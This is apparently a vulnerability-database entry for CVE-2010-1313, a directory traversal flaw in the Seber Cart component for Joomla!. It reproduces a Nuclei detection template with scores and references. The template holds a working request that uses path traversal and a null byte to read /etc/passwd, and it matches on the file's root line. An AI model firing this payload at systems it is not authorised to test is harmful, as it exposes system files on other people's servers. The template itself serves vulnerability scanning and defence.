Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1313
HistorySep 03, 2021 - 12:42 a.m.

Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

2021-09-0300:42:37
ProjectDiscovery
github.com
8
joomla
saber cart
local file inclusion
exploit-db
seber
cve-2010-1313

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.004

Percentile

75.3%

A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a … (dot dot) in the view parameter to index.php.

id: CVE-2010-1313

info:
  name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12082
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1313
    - http://www.exploit-db.com/exploits/12082
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2010-1313
    cwe-id: CWE-22
    epss-score: 0.0045
    epss-percentile: 0.75061
    cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: seber
    product: com_sebercart
  tags: cve,cve2010,joomla,lfi,edb,seber

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022015eb2f0633d1f1761aea73ac49a32a8c5f3f8d52eecf57edb76e58079036a216022047fcebd5259f4ddad0914d300ae4a4c5a374c3268897da3a734c54f4d85e3af7:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

6.6

Confidence

Low

EPSS

0.004

Percentile

75.3%

Related for NUCLEI:CVE-2010-1313